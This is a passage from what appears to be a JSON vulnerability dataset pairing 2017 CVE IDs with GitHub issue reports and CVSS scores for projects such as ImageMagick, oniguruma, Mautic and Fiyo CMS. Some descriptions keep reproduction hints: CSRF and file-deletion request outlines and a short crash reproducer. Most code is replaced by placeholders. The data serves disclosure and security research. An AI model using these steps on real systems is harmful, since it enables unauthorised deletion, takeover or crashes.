  15054. "exploitabilityScore": 1.8
  15055. },
  15056. {
  15057. "CVE_ID": "CVE-2017-8847",
  15058. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/67",
  15059. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/67",
  15060. "Repo_new": "ckolivas/lrzip",
  15061. "Issue_Created_At": "2017-03-24T15:46:53Z",
  15062. "description": "NULL pointer dereference in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15064. "severity": "MEDIUM",
  15065. "baseScore": 5.5,
  15066. "impactScore": 3.6,
  15067. "exploitabilityScore": 1.8
  15068. },
  15069. {
  15070. "CVE_ID": "CVE-2017-8848",
  15071. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/16",
  15072. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/16",
  15073. "Repo_new": "s3131212/allendisk",
  15074. "Issue_Created_At": "2017-05-08T15:11:17Z",
  15075. "description": "Change password exists CSRF Vulnerability (any change password). Version NUMBERTAG I found in your version NUMBERTAG that the change password did not produce a related token, resulting in a CSRF vulnerability Affected Files:",
  15076. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  15077. "severity": "MEDIUM",
  15078. "baseScore": 6.5,
  15079. "impactScore": 3.6,
  15080. "exploitabilityScore": 2.8
  15081. },
  15082. {
  15083. "CVE_ID": "CVE-2017-8853",
  15084. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/2",
  15085. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/2",
  15086. "Repo_new": "fiyocms/fiyocms",
  15087. "Issue_Created_At": "2017-04-17T08:12:06Z",
  15088. "description": "A any file delete vulnerability . I found that Fiyo CMS version NUMBERTAG has a any file delete vulnerability that do not need login. FILETAG There is not any checking about the $_POST['act'] $_POST[file] , client can control these two input to cause any file deletion . reproduce(this will delete .htaccess file): Url: URLTAG PATHTAG POST: APITAG Referrer: URLTAG Discoverer: APITAG of APITAG",
  15089. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15090. "severity": "HIGH",
  15091. "baseScore": 7.5,
  15092. "impactScore": 3.6,
  15093. "exploitabilityScore": 3.9
  15094. },
  15095. {
  15096. "CVE_ID": "CVE-2017-8868",
  15097. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/30",
  15098. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/30",
  15099. "Repo_new": "flatcore/flatcore-cms",
  15100. "Issue_Created_At": "2017-05-08T10:52:28Z",
  15101. "description": "Unprotected sqlite file deletion. There is a vulnerability in flatcore cms NUMBERTAG B NUMBERTAG which could delete APITAG file. And by exploiting this vulnerability the application won't be accessible. This vulnerability occurs because the file deletion request is just a GET request and there is no CSRF protection on the endpoint This is the request is URLTAG",
  15102. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15103. "severity": "HIGH",
  15104. "baseScore": 7.5,
  15105. "impactScore": 3.6,
  15106. "exploitabilityScore": 3.9
  15107. },
  15108. {
  15109. "CVE_ID": "CVE-2017-8874",
  15110. "Issue_Url_old": "https://github.com/mautic/mautic/issues/3486",
  15111. "Issue_Url_new": "https://github.com/mautic/mautic/issues/3486",
  15112. "Repo_new": "mautic/mautic",
  15113. "Issue_Created_At": "2017-02-21T15:45:50Z",
  15114. "description": "Authenticated CSRF in Delete Campaign / Contact. What type of report is this: | Q | A | | | Bug report? | Y | Feature request? | | Enhancement? | Description: Mautic suffers from autnehticated CSRF in which an attacker can trick a user/admin to delete campaigns or contacts. These two operations are not protected with an anti CSRF token. Other operations, e.g., adding contacts/campaigns are protected. If a bug: | Q | A | | | Mautic version NUMBERTAG as taken from Bitnami appliances) | PHP version | Steps to reproduce NUMBERTAG Get valid user session cookies and an ID of a campaign (or a contact NUMBERTAG Do a POST request (including the above cookies) to PATHTAG APITAG PATHTAG APITAG APITAG Replace APITAG with the ID of step NUMBERTAG Log errors: N.A.",
  15115. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15116. "severity": "HIGH",
  15117. "baseScore": 8.8,
  15118. "impactScore": 5.9,
  15119. "exploitabilityScore": 2.8
  15120. },
  15121. {
  15122. "CVE_ID": "CVE-2017-8891",
  15123. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/87",
  15124. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/87",
  15125. "Repo_new": "dropbox/lepton",
  15126. "Issue_Created_At": "2017-04-01T19:51:39Z",
  15127. "description": "SEGFAULT: Malformed lepton file generated by AFL + APITAG Hi, all. This malformed lepton file can cause crash. It can cause APITAG of lepton. Here is ASAN result and I attached the FILETAG . Thanks. ERRORTAG",
  15128. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15129. "severity": "MEDIUM",
  15130. "baseScore": 5.5,
  15131. "impactScore": 3.6,
  15132. "exploitabilityScore": 1.8
  15133. },
  15134. {
  15135. "CVE_ID": "CVE-2017-8911",
  15136. "Issue_Url_old": "https://github.com/verdammelt/tnef/issues/23",
  15137. "Issue_Url_new": "https://github.com/verdammelt/tnef/issues/23",
  15138. "Repo_new": "verdammelt/tnef",
  15139. "Issue_Created_At": "2017-05-10T08:48:17Z",
  15140. "description": "integer underflow in unicode_to_utf8 . tnef NUMBERTAG tnef f $file NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B: unicode_to_utf8 APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG mapi_attr_read APITAG NUMBERTAG by NUMBERTAG BD8: parse_file APITAG NUMBERTAG by NUMBERTAG main APITAG unsigned char unicode_to_utf8 (size_t len, unsigned char buf) { int i NUMBERTAG int j NUMBERTAG unsigned char utf8 = malloc NUMBERTAG len NUMBERTAG won't get any longer than this / for (i NUMBERTAG i < len NUMBERTAG i NUMBERTAG when len is NUMBERTAG len NUMBERTAG underflow FILETAG",
  15141. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15142. "severity": "CRITICAL",
  15143. "baseScore": 9.8,
  15144. "impactScore": 5.9,
  15145. "exploitabilityScore": 3.9
  15146. },
  15147. {
  15148. "CVE_ID": "CVE-2017-8929",
  15149. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/658",
  15150. "Issue_Url_new": "https://github.com/virustotal/yara/issues/658",
  15151. "Repo_new": "virustotal/yara",
  15152. "Issue_Created_At": "2017-05-12T06:39:04Z",
  15153. "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15155. "severity": "HIGH",
  15156. "baseScore": 7.5,
  15157. "impactScore": 3.6,
  15158. "exploitabilityScore": 3.9
  15159. },
  15160. {
  15161. "CVE_ID": "CVE-2017-8930",
  15162. "Issue_Url_old": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
  15163. "Issue_Url_new": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
  15164. "Repo_new": "simpleinvoices/simpleinvoices",
  15165. "Issue_Created_At": "2017-03-20T18:00:53Z",
  15166. "description": "CSRF in APITAG allows an attacker to take over the website. Hi everyone, I am copying here a message I sent to Richard Rowley a month ago to disclose a couple of CSRF in APITAG I assumed he was one of the developers of this project, but it looks like I was wrong. I didn't hear anything from him so I decided to open an issue here. ===== I found multiple CSRF vulnerabilities in APITAG APITAG The version of Simple Invoices that I used was taken from Bitnami. Unfortunately, it looks like they have taken it out from their library. None of the security relevant state changing operations are protected by an anti CSRF token. For example, consider the POST request to create a new administrator: POST APITAG ... [headers w/ cookies] APITAG An attacker can create an admin user with a CSRF and take over the entire website. The other operations that I have tested are (but I wouldn't exclude the presence of others): Enable/disable Paypal: APITAG Creation of new customers: APITAG Change tax rate: APITAG",
  15167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15168. "severity": "HIGH",
  15169. "baseScore": 8.8,
  15170. "impactScore": 5.9,
  15171. "exploitabilityScore": 2.8
  15172. },
  15173. {
  15174. "CVE_ID": "CVE-2017-8932",
  15175. "Issue_Url_old": "https://github.com/golang/go/issues/20040",
  15176. "Issue_Url_new": "https://github.com/golang/go/issues/20040",
  15177. "Repo_new": "golang/go",
  15178. "Issue_Created_At": "2017-04-19T17:00:24Z",
  15179. "description": "crypto/elliptic: carry bug in NUMBERTAG P NUMBERTAG Cloudflare reported a carry bug in the P NUMBERTAG implementation that they submitted for NUMBERTAG in NUMBERTAG bacfc NUMBERTAG fba4. I can reproduce this via random testing against APITAG and, after applying the patch that they provided, can no longer do so, even after NUMBERTAG APITAG NUMBERTAG APITAG iterations. This issue is not obviously exploitable, although we cannot rule out the possibility of someone managing to squeeze something through this hole. (It would be a cool paper.) Thus this should be treated as something to fix, but not something on fire, based on what we currently know. Fix will be coming in just a second.",
  15180. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  15181. "severity": "MEDIUM",
  15182. "baseScore": 5.9,
  15183. "impactScore": 3.6,
  15184. "exploitabilityScore": 2.2
  15185. },
  15186. {
  15187. "CVE_ID": "CVE-2017-9072",
  15188. "Issue_Url_old": "https://github.com/victorwon/calendarxp/issues/2",
  15189. "Issue_Url_new": "https://github.com/victorwon/calendarxp/issues/2",
  15190. "Repo_new": "victorwon/calendarxp",
  15191. "Issue_Created_At": "2017-04-24T16:52:39Z",
  15192. "description": "a placeholder for a security issue.",
  15193. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15194. "severity": "MEDIUM",
  15195. "baseScore": 6.1,
  15196. "impactScore": 2.7,
  15197. "exploitabilityScore": 2.8
  15198. },
  15199. {
  15200. "CVE_ID": "CVE-2017-9090",
  15201. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/25",
  15202. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/25",
  15203. "Repo_new": "s3131212/allendisk",
  15204. "Issue_Created_At": "2017-05-10T08:06:38Z",
  15205. "description": "Captcha Bypass Vulnerability in FILETAG . /reg.php CODETAG As with FILETAG , the following code does not check wether isset($_SESSION FILETAG",
  15206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15207. "severity": "HIGH",
  15208. "baseScore": 7.5,
  15209. "impactScore": 3.6,
  15210. "exploitabilityScore": 3.9
  15211. },
  15212. {
  15213. "CVE_ID": "CVE-2017-9091",
  15214. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/23",
  15215. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/23",
  15216. "Repo_new": "s3131212/allendisk",
  15217. "Issue_Created_At": "2017-05-10T03:04:29Z",
  15218. "description": "Captcha Bypass Vulnerability in FILETAG . /admin/loginc.php CODETAG Note that $_SESSION FILETAG How to fix: CODETAG",
  15219. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15220. "severity": "HIGH",
  15221. "baseScore": 7.5,
  15222. "impactScore": 3.6,
  15223. "exploitabilityScore": 3.9
  15224. },
  15225. {
  15226. "CVE_ID": "CVE-2017-9093",
  15227. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/26",
  15228. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/26",
  15229. "Repo_new": "jsummers/imageworsener",
  15230. "Issue_Created_At": "2017-05-13T18:36:03Z",
  15231. "description": "logical bug in src/imagew jpeg.c: my_skip_input_data_fn that leads to infinite loop. Done via fuzzed JPEG FILETAG 'my_skip_input_data_fn tries to skip NUMBERTAG bytes which is bigger than the file size thus leading to infinite loop trying to reread from the buffer I believe if reading failed there isn't too much that can be done to save the situation this is my suggested edit CODETAG",
  15232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15233. "severity": "MEDIUM",
  15234. "baseScore": 6.5,
  15235. "impactScore": 3.6,
  15236. "exploitabilityScore": 2.8
  15237. },
  15238. {
  15239. "CVE_ID": "CVE-2017-9094",
  15240. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/27",
  15241. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/27",
  15242. "Repo_new": "jsummers/imageworsener",
  15243. "Issue_Created_At": "2017-05-16T18:13:13Z",
  15244. "description": "Another infinite loop. Unfortunately i will not be able to provide help because the problem is within internals of GIF images first I would like to say that this image is fuzzed JPEG. FILETAG however this is a backtrace for where the hanging occured CODETAG the problem isn't how is it parsed but it is that it lead to infinite loop somehow",
  15245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15246. "severity": "MEDIUM",
  15247. "baseScore": 6.5,
  15248. "impactScore": 3.6,
  15249. "exploitabilityScore": 2.8
  15250. },
  15251. {
  15252. "CVE_ID": "CVE-2017-9110",
  15253. "Issue_Url_old": "https://github.com/openexr/openexr/issues/232",
  15254. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/232",
  15255. "Repo_new": "academysoftwarefoundation/openexr",
  15256. "Issue_Created_At": "2017-05-23T08:00:18Z",
  15257. "description": "Multiple segmentation faults CVETAG to CVETAG . Brandon Perry provided multiple images that can crash APITAG URLTAG The files he sent are here (along with the output of valgrind apparently) FILETAG Mitre assigned the following CVE to those issues: CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG",
  15258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15259. "severity": "MEDIUM",
  15260. "baseScore": 6.5,
  15261. "impactScore": 3.6,
  15262. "exploitabilityScore": 2.8
  15263. },
  15264. {
  15265. "CVE_ID": "CVE-2017-9141",
  15266. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/489",
  15267. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/489",
  15268. "Repo_new": "imagemagick/imagemagick",
  15269. "Issue_Created_At": "2017-05-15T18:11:32Z",
  15270. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
  15271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15272. "severity": "MEDIUM",
  15273. "baseScore": 6.5,
  15274. "impactScore": 3.6,
  15275. "exploitabilityScore": 2.8
  15276. },
  15277. {
  15278. "CVE_ID": "CVE-2017-9142",
  15279. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/490",
  15280. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/490",
  15281. "Repo_new": "imagemagick/imagemagick",
  15282. "Issue_Created_At": "2017-05-15T18:12:54Z",
  15283. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in blob.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
  15284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15285. "severity": "MEDIUM",
  15286. "baseScore": 6.5,
  15287. "impactScore": 3.6,
  15288. "exploitabilityScore": 2.8
  15289. },
  15290. {
  15291. "CVE_ID": "CVE-2017-9143",
  15292. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/456",
  15293. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/456",
  15294. "Repo_new": "imagemagick/imagemagick",
  15295. "Issue_Created_At": "2017-04-28T03:59:26Z",
  15296. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15298. "severity": "MEDIUM",
  15299. "baseScore": 6.5,
  15300. "impactScore": 3.6,
  15301. "exploitabilityScore": 2.8
  15302. },
  15303. {
  15304. "CVE_ID": "CVE-2017-9146",
  15305. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/47",
  15306. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/47",
  15307. "Repo_new": "yeraze/ytnef",
  15308. "Issue_Created_At": "2017-05-15T07:45:56Z",
  15309. "description": "heap buffer overrun: write extra bytes in APITAG We discover a buffer over write problem in the APITAG functiion. The cause is: The checker APITAG is not valid as the pointer d is incremented during exectuion. So the correct checking should use calculated value APITAG instead of NUMBERTAG We propose a initial patch to solve it. CODETAG ERRORTAG The testcase can be downloaded here FILETAG",
  15310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15311. "severity": "HIGH",
  15312. "baseScore": 8.8,
  15313. "impactScore": 5.9,
  15314. "exploitabilityScore": 2.8
  15315. },
  15316. {
  15317. "CVE_ID": "CVE-2017-9224",
  15318. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/57",
  15319. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/57",
  15320. "Repo_new": "kkos/oniguruma",
  15321. "Issue_Created_At": "2017-05-22T07:36:55Z",
  15322. "description": "Buffer Overflow in APITAG The buffer overflow is found with the code: ERRORTAG The asan err can be found as follows: ERRORTAG",
  15323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15324. "severity": "CRITICAL",
  15325. "baseScore": 9.8,
  15326. "impactScore": 5.9,
  15327. "exploitabilityScore": 3.9
  15328. },
  15329. {
  15330. "CVE_ID": "CVE-2017-9225",
  15331. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/56",
  15332. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/56",
  15333. "Repo_new": "kkos/oniguruma",
  15334. "Issue_Created_At": "2017-05-22T07:01:01Z",
  15335. "description": "Buffer Overflow in APITAG This buffer overflow is found in the latest develop branch with the code: include APITAG int APITAG { regex_t reg; const APITAG inp = (const APITAG ) PATHTAG if (onig_new (&reg, inp, inp NUMBERTAG ONIG_OPTION_IGNORECASE , ONIG_ENCODING_UTF NUMBERTAG BE, ONIG_SYNTAX_DEFAULT NUMBERTAG onig_free(reg); return NUMBERTAG Error reported in asan: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG ea4 at pc NUMBERTAG f9 bp NUMBERTAG ffc NUMBERTAG aa0 sp NUMBERTAG ffc NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG ea4 thread T NUMBERTAG f8 in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c5 in expand_case_fold_string PATHTAG NUMBERTAG in setup_tree PATHTAG NUMBERTAG c NUMBERTAG f in onig_compile PATHTAG NUMBERTAG d NUMBERTAG in onig_new PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f4ca3cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ec8 in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG ea4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG b in expand_case_fold_string PATHTAG This frame has NUMBERTAG object(s NUMBERTAG prev_node NUMBERTAG srem NUMBERTAG items' APITAG NUMBERTAG acc NUMBERTAG d NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG acc NUMBERTAG e NUMBERTAG acc NUMBERTAG f NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG acc NUMBERTAG f3 f NUMBERTAG f1 f NUMBERTAG acc NUMBERTAG f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG f4 f4 f2 f NUMBERTAG acc NUMBERTAG f2 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  15336. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15337. "severity": "CRITICAL",
  15338. "baseScore": 9.8,
  15339. "impactScore": 5.9,
  15340. "exploitabilityScore": 3.9
  15341. },
  15342. {
  15343. "CVE_ID": "CVE-2017-9226",
  15344. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/55",
  15345. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/55",
  15346. "Repo_new": "kkos/oniguruma",
  15347. "Issue_Created_At": "2017-05-18T04:28:31Z",
  15348. "description": "Heap corruption in APITAG in NUMBERTAG encodings. This heap corruption is due to a different cause than issue NUMBERTAG and NUMBERTAG the following is found after applying the patches of both. The issue affects latest PHP NUMBERTAG installations with mbstring enabled, when the regular expression is from network, this can be considered as a security issue. Tested on NUMBERTAG bit ASAN build, one of the NUMBERTAG encodings below would cause an out of bound write: $ cat FILETAG ERRORTAG $ bin/php FILETAG ERRORTAG",
  15349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15350. "severity": "CRITICAL",
  15351. "baseScore": 9.8,
  15352. "impactScore": 5.9,
  15353. "exploitabilityScore": 3.9
  15354. },
  15355. {
  15356. "CVE_ID": "CVE-2017-9227",
  15357. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/58",
  15358. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/58",
  15359. "Repo_new": "kkos/oniguruma",
  15360. "Issue_Created_At": "2017-05-22T15:23:45Z",
  15361. "description": "Bug in mbc_enc_len. The buffer overflow is found with the following code: ERRORTAG asan error can be found: ERRORTAG",
  15362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15363. "severity": "CRITICAL",
  15364. "baseScore": 9.8,
  15365. "impactScore": 5.9,
  15366. "exploitabilityScore": 3.9
  15367. },
  15368. {
  15369. "CVE_ID": "CVE-2017-9228",
  15370. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/60",
  15371. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/60",
  15372. "Repo_new": "kkos/oniguruma",
  15373. "Issue_Created_At": "2017-05-23T16:04:18Z",
  15374. "description": "Heap corruption in APITAG due to uninitialized local variable. The following non deterministic behavior can be triggered from the following code. With ASAN enabled, on NUMBERTAG bit platform, the crash reproduces within NUMBERTAG runs. ERRORTAG With some add on: ERRORTAG ERRORTAG ASAN report: ERRORTAG The probabilistic reproducer triggers a heap OOB write when the local variable APITAG vs in APITAG is not initialized, following the call as: APITAG > APITAG > APITAG resulting in the said crash. Note the calls to APITAG is currently necessary to trigger the crash.",
  15375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15376. "severity": "CRITICAL",
  15377. "baseScore": 9.8,
  15378. "impactScore": 5.9,
  15379. "exploitabilityScore": 3.9
  15380. },
  15381. {
  15382. "CVE_ID": "CVE-2017-9229",
  15383. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/59",
  15384. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/59",
  15385. "Repo_new": "kkos/oniguruma",
  15386. "Issue_Created_At": "2017-05-23T13:28:54Z",
  15387. "description": "SIGSEGV in APITAG due to bad dereference. Test code: ERRORTAG ASAN output: ERRORTAG In APITAG CODETAG Later reg >dmax is used in pointer arithmetic at forward_search_range, resulting in a bad reference from APITAG CODETAG Bad dereference: ERRORTAG",
  15388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15389. "severity": "HIGH",
  15390. "baseScore": 7.5,
  15391. "impactScore": 3.6,
  15392. "exploitabilityScore": 3.9
  15393. },
  15394. {
  15395. "CVE_ID": "CVE-2017-9249",
  15396. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/21",
  15397. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/21",
  15398. "Repo_new": "s3131212/allendisk",
  15399. "Issue_Created_At": "2017-05-09T09:28:07Z",
  15400. "description": "XSS Vulnerability in FILETAG . How to reproduce NUMBERTAG Upload FILETAG to your disk. FILETAG APITAG NUMBERTAG Make FILETAG public NUMBERTAG Get the link to FILETAG , eg. URLTAG NUMBERTAG SS would be triggered once user visit the link above. APITAG FILETAG",
  15401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15402. "severity": "MEDIUM",
  15403. "baseScore": 5.4,
  15404. "impactScore": 2.7,
  15405. "exploitabilityScore": 2.3
  15406. },
  15407. {
  15408. "CVE_ID": "CVE-2017-9250",
  15409. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/1821",
  15410. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/1821",
  15411. "Repo_new": "jerryscript-project/jerryscript",
  15412. "Issue_Created_At": "2017-05-13T02:26:02Z",
  15413. "description": "Denial of Service: Null Pointer De reference. I've discovered a NULL pointer de reference condition within Jerryscript. If the bytes NUMBERTAG c NUMBERTAG e NUMBERTAG a NUMBERTAG are evaluated by jerry_eval a segmentation fault will occur resulting in a denial of service. It occurs within jmem_heap_free_block when block_p >size is de referenced. Proof FILETAG The call tree is as follows (generally NUMBERTAG jerry_eval NUMBERTAG ecma_op_eval_chars_buffer NUMBERTAG parser_parse_script NUMBERTAG parser_parse_source NUMBERTAG lexer_next_token (parses the source for strings and returns NUMBERTAG parser_parse_statements (throws a parsing error via parser_raise_error and returns to the parser_parse_source PARSER_CATCH statement NUMBERTAG parser_free_literals NUMBERTAG util_free_literal NUMBERTAG jmem_heap_free_block (SEGMENTATION FAULT)",
  15414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15415. "severity": "HIGH",
  15416. "baseScore": 7.5,
  15417. "impactScore": 3.6,
  15418. "exploitabilityScore": 3.9
  15419. },
  15420. {
